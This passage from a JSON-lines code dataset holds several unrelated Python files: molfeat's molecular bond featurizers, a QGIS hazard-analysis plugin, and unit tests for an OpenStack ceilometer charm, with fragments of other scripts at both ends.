1:\n dcR = \"00\" + dcR\n elif len(dcR) == 2:\n dcR = \"0\" + dcR\n else:\n dcR = dcR\n\n\n text = aS + dcL + dcR + '$' + posX + '$' + posY\n\n time.sleep(0.1)\n client('a4:db:30:56:59:71',text, 4)\n\n\n\n# stop both motors\n#m_left.stop()\n#m_right.stop()\n","repo_name":"jprevc/LegoPixy","sub_path":"EV3blockDet.py","file_name":"EV3blockDet.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"74880241050","text":"from typing import Union\nfrom typing import Callable\nfrom typing import Optional\nfrom typing import Dict\nfrom typing import Iterable\n\nfrom collections import defaultdict\n\nimport importlib\nimport inspect\nimport datamol as dm\nimport numpy as np\n\nfrom 
molfeat._version import __version__ as MOLFEAT_VERSION\nfrom molfeat.calc.base import SerializableCalculator\nfrom molfeat.calc._atom_bond_features import bond_type_one_hot\nfrom molfeat.calc._atom_bond_features import bond_is_conjugated\nfrom molfeat.calc._atom_bond_features import bond_is_in_ring\nfrom molfeat.calc._atom_bond_features import bond_direction_one_hot\nfrom molfeat.calc._atom_bond_features import bond_stereo_one_hot\nfrom molfeat.calc._atom_bond_features import pairwise_ring_membership\nfrom molfeat.calc._atom_bond_features import pairwise_2D_dist\nfrom molfeat.calc._atom_bond_features import pairwise_bond_indicator\nfrom molfeat.calc._atom_bond_features import pairwise_dist_indicator\nfrom molfeat.utils import datatype\nfrom molfeat.utils.commons import concat_dict\nfrom molfeat.utils.commons import hex_to_fn\nfrom molfeat.utils.commons import fn_to_hex\n\n\nclass BondCalculator(SerializableCalculator):\n \"\"\"\n A class for bond featurizer which loops over all bonds in a molecule and\n featurizes them with the ``featurizer_funcs``. The constructed graph is assumed to be\n a bi-directed graph by default.\n \"\"\"\n\n DEFAULT_FEATURIZER = {\n \"bond_type_one_hot\": bond_type_one_hot,\n \"bond_stereo_one_hot\": bond_stereo_one_hot,\n \"bond_is_in_ring\": bond_is_in_ring,\n \"bond_is_conjugated\": bond_is_conjugated,\n \"bond_direction_one_hot\": bond_direction_one_hot,\n }\n\n def __init__(\n self,\n featurizer_funcs: Union[list, dict] = None,\n self_loop: bool = False,\n concat: bool = True,\n name: str = \"he\",\n ):\n \"\"\"\n Init function of the bond property calculator\n\n Args:\n featurizer_funcs: Mapping feature name to the featurization function.\n self_loop: Whether self loops will be added. Default to False. If True, an additional\n column of binary values to indicate the identity of self loops will be added.\n The other features of the self loops will be zero.\n concat: Whether to concat all the data into a single value in the output dict\n name: Name of the key name of the concatenated features\n \"\"\"\n self._input_kwargs = locals().copy()\n self._input_kwargs.pop(\"self\")\n # remove featurizer_funcs too\n self._input_kwargs.pop(\"featurizer_funcs\", None)\n self._toy_mol = dm.to_mol(\"CO\")\n self._feat_sizes = dict()\n if featurizer_funcs is None:\n featurizer_funcs = self.DEFAULT_FEATURIZER\n if not isinstance(featurizer_funcs, dict):\n get_name = lambda x: getattr(x, \"__name__\", repr(x))\n featurizer_funcs = dict((get_name(x), x) for x in featurizer_funcs)\n self.featurizer_funcs = featurizer_funcs\n self._self_loop = self_loop\n self.concat = concat\n self.name = name\n for k in self.featurizer_funcs.keys():\n self.feat_size(feat_name=k)\n if self._self_loop:\n self._feat_sizes[\"self_loop\"] = 1\n\n def to_state_dict(self):\n \"\"\"Convert the Atom calculator to a state dict\n Due to some constraints and cross-version compatibility, the featurizer functions\n need to be pickled and not just list\n \"\"\"\n state_dict = {}\n state_dict[\"name\"] = self.__class__.__name__\n state_dict[\"module\"] = self.__class__.__module__\n state_dict[\"args\"] = self._input_kwargs\n\n featurizer_fn_pickled = {}\n for fname, ffunc in self.featurizer_funcs.items():\n featurizer_fn_pickled[fname] = fn_to_hex(ffunc)\n state_dict[\"args\"][\"featurizer_funcs\"] = featurizer_fn_pickled\n state_dict[\"_molfeat_version\"] = MOLFEAT_VERSION\n signature = inspect.signature(self.__init__)\n val = {\n k: v.default\n for k, v in signature.parameters.items()\n # if v.default is 
not inspect.Parameter.empty\n }\n to_remove = [k for k in state_dict[\"args\"] if k not in val.keys()]\n for k in to_remove:\n state_dict[\"args\"].pop(k)\n return state_dict\n\n @classmethod\n def from_state_dict(cls, state_dict, override_args: Optional[dict] = None):\n \"\"\"Create an instance of an atom calculator from a state dict\n\n Args:\n state_dict: state dictionary to use to create the atom calculator\n override_args: optional dictionary of arguments to override the ones in the state dict\n at construction of the new object\n \"\"\"\n # EN: at this moment, version compatibility is not enforced\n cls_name = state_dict.get(\"name\", cls.__name__)\n module_name = state_dict.get(\"module\", cls.__module__)\n module = importlib.import_module(module_name)\n klass = getattr(module, cls_name)\n\n kwargs = state_dict[\"args\"].copy()\n # now we need to unpickle the featurizer functions\n featurizer_fn_pickled = kwargs.pop(\"featurizer_funcs\", None)\n if featurizer_fn_pickled is not None:\n featurizer_fn_loaded = {}\n for k, v in featurizer_fn_pickled.items():\n featurizer_fn_loaded[k] = hex_to_fn(v)\n kwargs[\"featurizer_funcs\"] = featurizer_fn_loaded\n kwargs.update(**(override_args or {}))\n return klass(**kwargs)\n\n def _concat(self, data_dict: Dict[str, Iterable]):\n \"\"\"Concatenate the data into a single value\n\n Args:\n data_dict: mapping of feature names to tensor/arrays\n Returns:\n concatenated_dict: a dict with a single key where all array have been concatenated\n \"\"\"\n return concat_dict(data_dict, new_name=self.name)\n\n def feat_size(self, feat_name: Optional[str] = None):\n \"\"\"Get the feature size for ``feat_name``.\n\n When there is only one feature, ``feat_name`` can be None.\n\n Args:\n feat_name: Feature for query.\n\n Returns:\n int: Feature size for the feature with name ``feat_name``. 
Default to None.\n \"\"\"\n if feat_name is None:\n assert (\n len(self.featurizer_funcs) == 1\n ), \"feat_name should be provided if there are more than one features\"\n feat_name = list(self.featurizer_funcs.keys())[0]\n\n if feat_name not in self.featurizer_funcs:\n raise ValueError(\n \"Expect feat_name to be in {}, got {}\".format(\n list(self.featurizer_funcs.keys()), feat_name\n )\n )\n if feat_name not in self._feat_sizes:\n bond = self._toy_mol.GetBondWithIdx(0)\n self._feat_sizes[feat_name] = len(self.featurizer_funcs[feat_name](bond))\n return self._feat_sizes[feat_name]\n\n def __len__(self):\n \"\"\"Get length of the property estimator\"\"\"\n return sum(v for k, v in self._feat_sizes.items() if k != self.name)\n\n def __call__(self, mol: Union[dm.Mol, str], dtype: Callable = None, **kwargs):\n \"\"\"Featurize all bonds in a molecule.\n\n Args:\n mol: the molecule of interest\n dtype: requested data type\n\n Returns:\n dict: For each function in self.featurizer_funcs with the key ``k``,\n store the computed feature under the key ``k``.\n \"\"\"\n mol = dm.to_mol(mol)\n num_bonds = mol.GetNumBonds()\n bond_features = defaultdict(list)\n\n # Compute features for each bond\n for i in range(num_bonds):\n bond = mol.GetBondWithIdx(i)\n for feat_name, feat_func in self.featurizer_funcs.items():\n feat = feat_func(bond)\n bond_features[feat_name].extend([feat, feat.copy()])\n\n # Stack the features and convert them to float arrays\n processed_features = dict()\n for feat_name, feat_list in bond_features.items():\n feat = np.stack(feat_list)\n processed_features[feat_name] = feat\n\n if self._self_loop and num_bonds > 0:\n num_atoms = mol.GetNumAtoms()\n for feat_name in processed_features:\n feats = processed_features[feat_name]\n # add a new label that says the feat are not self loop\n # feats = np.concatenate([feats, np.zeros((feats.shape[0], 1))], axis=1)\n # add a label at the last position that says it's a selfloop\n add_edges = np.zeros((num_atoms, feats.shape[1]))\n # self_loop_feats[:, -1] = 1\n feats = np.concatenate([feats, add_edges], axis=0)\n processed_features[feat_name] = feats\n self_loop_feats = np.concatenate(\n [np.zeros((num_bonds * 2, 1)), np.ones((num_atoms, 1))]\n )\n\n processed_features[\"self_loop\"] = self_loop_feats\n\n if self._self_loop and num_bonds == 0:\n num_atoms = mol.GetNumAtoms()\n old_concat = self.concat\n self.concat = False\n processed_features = self(self._toy_mol)\n self.concat = old_concat\n for feat_name in processed_features:\n feats = processed_features[feat_name]\n feats = np.zeros((num_atoms, feats.shape[1]))\n processed_features[feat_name] = feats\n if self.concat and (num_bonds > 0 or self._self_loop):\n processed_features = self._concat(processed_features)\n if dtype is not None:\n for feat_name, feat in processed_features.items():\n feat = datatype.cast(feat, dtype=dtype)\n processed_features[feat_name] = feat\n\n return processed_features\n\n\nclass EdgeMatCalculator(BondCalculator):\n \"\"\"Generate edge featurizer matrix\"\"\"\n\n DEFAULT_PAIRWISE_FEATURIZER = {\n \"pairwise_2D_dist\": pairwise_2D_dist,\n # \"pairwise_3D_dist\": pairwise_3D_dist,\n \"pairwise_ring_membership\": pairwise_ring_membership,\n }\n\n def __init__(\n self,\n featurizer_funcs: Union[list, dict] = None,\n pairwise_atom_funcs: Union[list, dict, str] = \"default\",\n name: str = \"he\",\n ):\n \"\"\"\n Init function of the edge matrix property calculator\n\n Args:\n featurizer_funcs: Mapping feature name to the featurization function.\n 
pairwise_atom_funcs: Mapping feature name to pairwise featurization function.\n Use the keywords \"default\" for the default values\n \"\"\"\n if pairwise_atom_funcs == \"default\":\n pairwise_atom_funcs = self.DEFAULT_PAIRWISE_FEATURIZER\n if not isinstance(pairwise_atom_funcs, dict):\n get_name = lambda x: getattr(x, \"__name__\", repr(x))\n pairwise_atom_funcs = dict((get_name(x), x) for x in pairwise_atom_funcs)\n self.pairwise_atom_funcs = pairwise_atom_funcs\n super().__init__(featurizer_funcs=featurizer_funcs, concat=True, name=name)\n # add conf data to toy mol\n self._toy_mol = dm.conformers.generate(self._toy_mol, n_confs=1, minimize_energy=False)\n for k in self.pairwise_atom_funcs.keys():\n self.feat_size(feat_name=k)\n\n def to_state_dict(self):\n \"\"\"Convert the Atom calculator to a state dict\n Due to some constraints and cross-version compatibility, the featurizer functions\n need to be pickled and not just list\n \"\"\"\n state_dict = super().to_state_dict()\n # repeat for the pairwise one\n pairwise_atom_fn_pickled = {}\n for fname, ffunc in self.pairwise_atom_funcs.items():\n pairwise_atom_fn_pickled[fname] = fn_to_hex(ffunc)\n state_dict[\"args\"][\"pairwise_atom_funcs\"] = pairwise_atom_fn_pickled\n return state_dict\n\n @classmethod\n def from_state_dict(cls, state_dict, override_args: Optional[dict] = None):\n \"\"\"Create an instance of an atom calculator from a state dict\n\n Args:\n state_dict: state dictionary to use to create the atom calculator\n override_args: optional dictionary of arguments to override the ones in the state dict\n at construction of the new object\n \"\"\"\n # EN: at this moment, version compatibility is not enforced\n cls_name = state_dict.get(\"name\", cls.__name__)\n module_name = state_dict.get(\"module\", cls.__module__)\n module = importlib.import_module(module_name)\n klass = getattr(module, cls_name)\n\n kwargs = state_dict[\"args\"].copy()\n # now we need to unpickle the featurizer functions\n featurizer_fn_pickled = kwargs.pop(\"featurizer_funcs\", None)\n if featurizer_fn_pickled is not None:\n featurizer_fn_loaded = {}\n for k, v in featurizer_fn_pickled.items():\n featurizer_fn_loaded[k] = hex_to_fn(v)\n kwargs[\"featurizer_funcs\"] = featurizer_fn_loaded\n\n pairwise_atom_fn_pickled = kwargs.pop(\"pairwise_atom_funcs\", None)\n if pairwise_atom_fn_pickled is not None:\n pairwise_atom_fn_loaded = {}\n for k, v in pairwise_atom_fn_pickled.items():\n pairwise_atom_fn_loaded[k] = hex_to_fn(v)\n kwargs[\"pairwise_atom_funcs\"] = pairwise_atom_fn_loaded\n kwargs.update(**(override_args or {}))\n return klass(**kwargs)\n\n def feat_size(self, feat_name: Optional[str] = None):\n \"\"\"Get the feature size for ``feat_name``.\n\n Args:\n feat_name: Feature for query.\n\n Returns:\n int: Feature size for the feature with name ``feat_name``. 
Default to None.\n \"\"\"\n if feat_name not in self.featurizer_funcs and feat_name not in self.pairwise_atom_funcs:\n raise ValueError(\n \"Expect feat_name to be in {}, got {}\".format(\n list(self.featurizer_funcs.keys()), feat_name\n )\n )\n if feat_name not in self._feat_sizes:\n if feat_name in self.featurizer_funcs:\n bond = self._toy_mol.GetBondWithIdx(0)\n self._feat_sizes[feat_name] = len(self.featurizer_funcs[feat_name](bond))\n elif feat_name in self.pairwise_atom_funcs:\n self._feat_sizes[feat_name] = self.pairwise_atom_funcs[feat_name](\n self._toy_mol\n ).shape[-1]\n else:\n raise ValueError(f\"Feature name {feat_name} is not defined !\")\n return self._feat_sizes[feat_name]\n\n def __call__(self, mol: Union[dm.Mol, str], dtype: Callable = None, flat: bool = True):\n \"\"\"Featurize all bonds in a molecule.\n\n Args:\n mol: the molecule of interest\n dtype: requested data type\n flat: whether to return a collapsed N^2, M or a N, N, M matrix\n\n Returns:\n dict: For each function in self.featurizer_funcs with the key ``k``,\n store the computed feature under the key ``k``.\n \"\"\"\n\n mol = dm.to_mol(mol)\n num_bonds = mol.GetNumBonds()\n num_atoms = mol.GetNumAtoms()\n feat_size = len(self)\n edge_matrix = None\n\n if self.pairwise_atom_funcs is not None:\n feat_size -= sum(self._feat_sizes[x] for x in self.pairwise_atom_funcs.keys())\n if self.featurizer_funcs is not None and len(self.featurizer_funcs) > 0:\n edge_matrix = np.zeros((num_atoms, num_atoms, feat_size))\n # Compute features for each bond\n for i in range(num_bonds):\n bond = mol.GetBondWithIdx(i)\n a_idx_1 = bond.GetBeginAtomIdx()\n a_idx_2 = bond.GetEndAtomIdx()\n bond_features = defaultdict(list)\n for feat_name, feat_func in self.featurizer_funcs.items():\n feat = feat_func(bond)\n bond_features[feat_name].extend([feat])\n bond_features = self._concat(bond_features)[self.name]\n edge_matrix[a_idx_1, a_idx_2] = bond_features\n edge_matrix[a_idx_2, a_idx_1] = bond_features\n\n edge_matrix = edge_matrix.reshape(-1, feat_size)\n if self.pairwise_atom_funcs is not None:\n pwise_features = dict()\n for pname, pfunc in self.pairwise_atom_funcs.items():\n pwise_features[pname] = pfunc(mol)\n pwise_features = self._concat(pwise_features)[self.name]\n if edge_matrix is not None:\n edge_matrix = np.concatenate([edge_matrix, pwise_features], axis=-1)\n else:\n edge_matrix = pwise_features\n if not flat:\n edge_matrix = edge_matrix.reshape(num_atoms, num_atoms, -1)\n if dtype is not None:\n edge_matrix = datatype.cast(edge_matrix, dtype=dtype)\n return {self.name: edge_matrix}\n\n\nclass DGLCanonicalBondCalculator(BondCalculator):\n DEFAULT_FEATURIZER = {\n \"bond_type_one_hot\": bond_type_one_hot,\n \"bond_is_conjugated\": bond_is_conjugated,\n \"bond_is_in_ring\": bond_is_in_ring,\n \"bond_stereo_one_hot\": bond_stereo_one_hot,\n }\n\n def _concat(self, data_dict: Dict[str, Iterable]):\n \"\"\"Concatenate the data into a single value\n\n Args:\n data_dict: mapping of feature names to tensor/arrays\n Returns:\n concatenated_dict: a dict with a single key where all array have been concatenated\n \"\"\"\n return concat_dict(data_dict, new_name=self.name, order=list(self.featurizer_funcs.keys()))\n\n\nclass DGLWeaveEdgeCalculator(EdgeMatCalculator):\n \"\"\"Edge featurizer used by WeaveNets\n\n The edge featurization is introduced in `Molecular Graph Convolutions:\n Moving Beyond Fingerprints `__.\n\n This featurization is performed for a complete graph of atoms with self loops added,\n which considers the following 
default:\n\n * Number of bonds between each pairs of atoms\n * One-hot encoding of bond type if a bond exists between a pair of atoms\n * Whether a pair of atoms belongs to a same ring\n\n \"\"\"\n\n DEFAULT_FEATURIZER = {}\n DEFAULT_PAIRWISE_FEATURIZER = {\n \"pairwise_dist_indicator\": pairwise_dist_indicator,\n \"pairwise_bond_indicator\": pairwise_bond_indicator,\n \"pairwise_ring_membership\": pairwise_ring_membership,\n }\n\n def _concat(self, data_dict: Dict[str, Iterable]):\n \"\"\"Concatenate the data into a single value\n\n Args:\n data_dict: mapping of feature names to tensor/arrays\n Returns:\n concatenated_dict: a dict with a single key where all array have been concatenated\n \"\"\"\n\n # To reproduce DGLDefault, we need to keep the order of dict insertion\n return concat_dict(\n data_dict, new_name=self.name, order=list(self.pairwise_atom_funcs.keys())\n )\n","repo_name":"datamol-io/molfeat","sub_path":"molfeat/calc/bond.py","file_name":"bond.py","file_ext":"py","file_size_in_byte":19048,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"32"} +{"seq_id":"7236826895","text":"__author__ = 'Ben Hur S. Pintor '\n__date__ = '01/03/2017'\n\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nfrom PyQt4 import uic\nfrom qgis.core import *\nimport os\n\n\nclass MHCVAM:\n \"\"\"QGIS plugin implementation\"\"\"\n\n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n \"\"\"\n # Save reference to the QGIS interface\n self.iface = iface\n\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n\n # initialize locale\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'MHCVAM_{}.qm'.format(locale))\n\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n\n if qVersion() > '4.3.3':\n QCoreApplication.installTranslator(self.translator)\n\n # Declare instance attributes\n self.action_mhcvam_unicef_indicators = None\n self.action_mhcvam_unicef_indicators_household = None\n self.action_mhcvam_barangay = None\n self.action_mhcvam_household = None\n self.action_mhcvam_infrastructures = None\n self.actions = []\n self.menu = self.tr(u'&MHCVAM')\n\n # Create a dockable toolbar aside from the Menu in \"Plugins\"\n self.toolbar = self.iface.addToolBar(u'MHCVAM')\n self.toolbar.setObjectName(u'MHCVAM')\n\n\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('MHCVAM', message)\n\n\n def add_action(self, action, add_to_toolbar=True):\n \"\"\"Add the action to the MHCVAM toolbar\n\n :param action: The action that should be added to the toolbar.\n :type action: QAction\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the MHCVAM toolbar. 
Defaults to True.\n :type add_to_toolbar: bool\n\n \"\"\"\n # store in the class list of actions for easy plugin unloading\n self.actions.append(action)\n self.iface.addPluginToMenu(self.tr('MHCVAM'), action)\n if add_to_toolbar:\n self.toolbar.addAction(action)\n\n\n def initGui(self):\n \"\"\"Gui initialisation procedure (for QGIS plugin api).\n\n .. note:: Don't change the name of this method from initGui!\n\n This method is called by QGIS and should be used to set up\n any graphical user interface elements that should appear in QGIS by\n default (i.e. before the user performs any explicit action with the\n plugin).\n \"\"\"\n\n # Create a dockable toolbar aside from the Menu in \"Plugins\"\n self.toolbar = self.iface.addToolBar('MHCVAM')\n self.toolbar.setObjectName('MHCVAMToolBar')\n\n # Create the Menu in \"Plugins\"\n self._create_mhcvam_unicef_indicators_action()\n self._create_mhcvam_unicef_indicators_household_action()\n self._create_mhcvam_barangay_action()\n self._create_mhcvam_household_action()\n self._create_mhcvam_infrastructures_action()\n\n\n def unload(self):\n \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n\n for action in self.actions:\n self.iface.removePluginMenu(\n self.tr(u'&MHCVAM'),\n action)\n self.iface.removeToolBarIcon(action)\n self.iface.unregisterMainWindowAction(action)\n\n # remove the toolbar\n self.iface.mainWindow().removeToolBar(self.toolbar)\n\n\n '''Child-centered Indicators Methods'''\n def _create_mhcvam_unicef_indicators_action(self):\n \"\"\"Create action for MHCVAM using Child-centered Indicators\"\"\"\n\n icon = os.path.dirname(__file__) + '/img/icons/icon-unicef-indicators.png'\n self.action_mhcvam_unicef_indicators = QAction(\n QIcon(icon),\n self.tr('MHCVAM using Child-centered Indicators (BARANGAY)'),\n self.iface.mainWindow())\n self.action_mhcvam_unicef_indicators.setStatusTip(\n self.tr('MHCVAM using Child-centered Indicators (BARANGAY)'))\n self.action_mhcvam_unicef_indicators.setWhatsThis(\n self.tr('Perform MHCVAM using Child-centered Indicators (BARANGAY)'))\n self.action_mhcvam_unicef_indicators.triggered.connect(\n self.mhcvam_unicef_indicators)\n self.add_action(\n self.action_mhcvam_unicef_indicators)\n\n\n def _create_mhcvam_unicef_indicators_household_action(self):\n \"\"\"Create action for MHCVAM using Child-centered Indicators (Household)\"\"\"\n\n icon = os.path.dirname(__file__) + '/img/icons/icon-unicef-indicators-household.png'\n self.action_mhcvam_unicef_indicators_household = QAction(\n QIcon(icon),\n self.tr('MHCVAM using Child-centered Indicators (HOUSEHOLD)'),\n self.iface.mainWindow())\n self.action_mhcvam_unicef_indicators_household.setStatusTip(\n self.tr('MHCVAM using Child-centered Indicators (HOUSEHOLD)'))\n self.action_mhcvam_unicef_indicators_household.setWhatsThis(\n self.tr('Perform MHCVAM using Child-centered Indicators (HOUSEHOLD)'))\n self.action_mhcvam_unicef_indicators_household.triggered.connect(\n self.mhcvam_unicef_indicators_household)\n self.add_action(\n self.action_mhcvam_unicef_indicators_household)\n\n\n def mhcvam_unicef_indicators(self):\n \"\"\"Show dialog for MHCVAM using Child-centered Indicators\"\"\"\n\n from mhcvam_unicef_indicators_dialog import MHCVAMUnicefIndicatorsDialog\n\n # Run only if there are layers already loaded into QGIS\n if len(QgsMapLayerRegistry.instance().mapLayers()) > 0:\n dialog = MHCVAMUnicefIndicatorsDialog(\n self.iface.mainWindow(),\n self.iface)\n dialog.exec_()\n\n else:\n msg = \"NO LAYERS FOUND.\\n\\nAdd layers first before running the 
plugin.\"\n QMessageBox.critical(self.iface.mainWindow(), \"WARNING\", msg)\n\n\n def mhcvam_unicef_indicators_household(self):\n \"\"\"Show dialog for MHCVAM using Child-centered Indicators (Household)\"\"\"\n\n # from mhcvam_unicef_indicators_household_dialog import MHCVAMUnicefIndicatorsHouseholdDialog\n from mhcvam_unicef_indicators_household_dialog import MHCVAMUnicefIndicatorsHouseholdDialog\n\n # Run only if there are layers already loaded into QGIS\n if len(QgsMapLayerRegistry.instance().mapLayers()) > 0:\n dialog = MHCVAMUnicefIndicatorsHouseholdDialog(\n self.iface.mainWindow(),\n self.iface)\n dialog.exec_()\n\n else:\n msg = \"NO LAYERS FOUND.\\n\\nAdd layers first before running the plugin.\"\n QMessageBox.critical(self.iface.mainWindow(), \"WARNING\", msg)\n\n\n '''Household Methods'''\n def _create_mhcvam_household_action(self):\n \"\"\"Create action for Household-level Hazard and Vulnerability Analysis\"\"\"\n\n icon = os.path.dirname(__file__) + '/img/icons/icon-household.png'\n self.action_mhcvam_household = QAction(\n QIcon(icon),\n self.tr('Household-level Hazard and Vulnerability Analysis'),\n self.iface.mainWindow())\n self.action_mhcvam_household.setStatusTip(\n self.tr('Household-level Hazard and Vulnerability Analysis'))\n self.action_mhcvam_household.setWhatsThis(\n self.tr('Perform Household-level Hazard and Vulnerability Analysis'))\n self.action_mhcvam_household.triggered.connect(\n self.mhcvam_household)\n self.add_action(\n self.action_mhcvam_household)\n\n\n def mhcvam_household(self):\n \"\"\"Show dialog for Household-level Hazard and Vulnerability Analysis\"\"\"\n\n from mhcvam_household_dialog import MHCVAMHouseholdDialog\n\n # Run only if there are layers already loaded into QGIS\n if len(QgsMapLayerRegistry.instance().mapLayers()) > 0:\n dialog = MHCVAMHouseholdDialog(\n self.iface.mainWindow(),\n self.iface)\n dialog.exec_()\n\n else:\n msg = \"NO LAYERS FOUND.\\n\\nAdd layers first before running the plugin.\"\n QMessageBox.critical(self.iface.mainWindow(), \"WARNING\", msg)\n\n\n '''Barangay Methods'''\n def _create_mhcvam_barangay_action(self):\n \"\"\"Create action for Barangay-level Hazard and Vulnerability Analysis\"\"\"\n\n icon = os.path.dirname(__file__) + '/img/icons/icon-barangay.png'\n self.action_mhcvam_barangay = QAction(\n QIcon(icon),\n self.tr('Barangay-level Hazard and Vulnerability Analysis'),\n self.iface.mainWindow())\n self.action_mhcvam_barangay.setStatusTip(\n self.tr('Barangay-level Hazard and Vulnerability Analysis'))\n self.action_mhcvam_barangay.setWhatsThis(\n self.tr('Perform Barangay-level Hazard and Vulnerability Analysis'))\n self.action_mhcvam_barangay.triggered.connect(\n self.mhcvam_barangay)\n self.add_action(\n self.action_mhcvam_barangay)\n\n\n def mhcvam_barangay(self):\n \"\"\"Show dialog for Barangay-level Hazard and Vulnerability Analysis\"\"\"\n\n from mhcvam_barangay_dialog import MHCVAMBarangayDialog\n\n # Run only if there are layers already loaded into QGIS\n if len(QgsMapLayerRegistry.instance().mapLayers()) > 0:\n dialog = MHCVAMBarangayDialog(\n self.iface.mainWindow(),\n self.iface)\n dialog.exec_()\n\n else:\n msg = \"NO LAYERS FOUND.\\n\\nAdd layers first before running the plugin.\"\n QMessageBox.critical(self.iface.mainWindow(), \"WARNING\", msg)\n\n\n '''Infrastructures Methods'''\n def _create_mhcvam_infrastructures_action(self):\n \"\"\"Create action for Infrastructures Hazard Analysis\"\"\"\n\n icon = os.path.dirname(__file__) + '/img/icons/icon-infrastructures.png'\n 
self.action_mhcvam_infrastructures = QAction(\n QIcon(icon),\n self.tr('Infrastructures Hazard Analysis'),\n self.iface.mainWindow())\n self.action_mhcvam_infrastructures.setStatusTip(\n self.tr('Infrastructures Hazard Analysis'))\n self.action_mhcvam_infrastructures.setWhatsThis(\n self.tr('Perform Infrastructures Hazard Analysis'))\n self.action_mhcvam_infrastructures.triggered.connect(\n self.mhcvam_infrastructures)\n self.add_action(\n self.action_mhcvam_infrastructures)\n\n\n def mhcvam_infrastructures(self):\n \"\"\"Show dialog for Infratructures Hazard Analysis\"\"\"\n\n from mhcvam_infrastructures_dialog import MHCVAMInfrastructuresDialog\n\n # Run only if there are layers already loaded into QGIS\n if len(QgsMapLayerRegistry.instance().mapLayers()) > 0:\n dialog = MHCVAMInfrastructuresDialog(\n self.iface.mainWindow(),\n self.iface)\n dialog.exec_()\n\n else:\n msg = \"NO LAYERS FOUND.\\n\\nAdd layers first before running the plugin.\"\n QMessageBox.critical(self.iface.mainWindow(), \"WARNING\", msg)\n","repo_name":"benhur07b/mhcvam","sub_path":"mhcvam.py","file_name":"mhcvam.py","file_ext":"py","file_size_in_byte":11739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14041319179","text":"import json\nfrom unittest.mock import patch\n\nimport ceilometer_utils\n\nwith patch('ceilometer_utils.register_configs'):\n with patch('ceilometer_utils.restart_map'):\n import ceilometer_hooks as hooks\n\nfrom test_utils import CharmTestCase\n\nTO_PATCH = [\n 'CONFIGS',\n 'apt_install',\n 'apt_update',\n 'filter_installed_packages',\n 'get_packages',\n 'releases_packages_map',\n 'services',\n 'is_relation_made',\n 'relation_set',\n 'update_nrpe_config',\n]\n\n\nclass CeilometerHooksTest(CharmTestCase):\n\n def setUp(self):\n super(CeilometerHooksTest, self).setUp(hooks, TO_PATCH)\n\n @patch('charmhelpers.core.hookenv.config')\n def test_install_hook(self, mock_config):\n ceil_pkgs = ['pkg1', 'pkg2']\n self.filter_installed_packages.return_value = ceil_pkgs\n hooks.hooks.execute(['hooks/install'])\n self.apt_update.assert_called_with(fatal=True)\n self.apt_install.assert_called_with(ceil_pkgs, fatal=True)\n\n @patch('charmhelpers.core.hookenv.config')\n def test_ceilometer_changed(self, mock_config):\n hooks.hooks.execute(['hooks/ceilometer-service-relation-changed'])\n self.assertTrue(self.CONFIGS.write_all.called)\n self.assertTrue(self.update_nrpe_config.called)\n\n @patch('charmhelpers.core.hookenv.config')\n def test_ceilometer_changed_no_nrpe(self, mock_config):\n self.is_relation_made.return_value = False\n\n hooks.hooks.execute(['hooks/ceilometer-service-relation-changed'])\n self.assertTrue(self.CONFIGS.write_all.called)\n self.assertFalse(self.update_nrpe_config.called)\n\n @patch('charmhelpers.core.hookenv.config')\n def test_nova_ceilometer_joined(self, mock_config):\n mocked_releases_packages_map = {\n 'ussuri': {\n 'deb': {\n 'install': [\n 'ceilometer-common', 'ceilometer-agent-compute',\n 'python3-ceilometer', 'python3-memcache'],\n 'purge': ['python-ceilometer'],\n }}}\n mocked_services = ['ceilometer-agent-compute']\n\n self.releases_packages_map.return_value = mocked_releases_packages_map\n self.services.return_value = mocked_services\n hooks.hooks.execute(['hooks/nova-ceilometer-relation-joined'])\n self.relation_set.assert_called_with(\n relation_id=None,\n relation_settings={\n 'subordinate_configuration': json.dumps(\n ceilometer_utils.NOVA_SETTINGS),\n 'releases-packages-map': json.dumps(\n 
mocked_releases_packages_map, sort_keys=True),\n 'services': json.dumps(mocked_services)})\n\n @patch('charmhelpers.core.hookenv.config')\n def test_config_changed(self, mock_config):\n self.is_relation_made.return_value = True\n self.filter_installed_packages.return_value = ['pkg1', 'pkg2']\n hooks.hooks.execute(['hooks/config-changed'])\n self.update_nrpe_config.assert_called_once_with()\n self.CONFIGS.write_all.assert_called_once_with()\n self.apt_install.assert_called_once_with(['pkg1', 'pkg2'], fatal=True)\n self.is_relation_made.assert_called_once_with('nrpe-external-master')\n\n @patch('charmhelpers.core.hookenv.config')\n def test_config_changed_no_nrpe(self, mock_config):\n self.is_relation_made.return_value = False\n self.filter_installed_packages.return_value = ['pkg1', 'pkg2']\n hooks.hooks.execute(['hooks/config-changed'])\n self.assertFalse(self.update_nrpe_config.called)\n self.CONFIGS.write_all.assert_called_once_with()\n self.apt_install.assert_called_once_with(['pkg1', 'pkg2'], fatal=True)\n self.is_relation_made.assert_called_once_with('nrpe-external-master')\n","repo_name":"openstack/charm-ceilometer-agent","sub_path":"unit_tests/test_ceilometer_hooks.py","file_name":"test_ceilometer_hooks.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"17677400249","text":"#!/usr/bin/env python\n\ndef create_html_page(cid, category_list):\n \"\"\"\n Create an html file with given cid as name, and category_list as data.\n :param cid (int): category id\n :param category_list (list): list of record 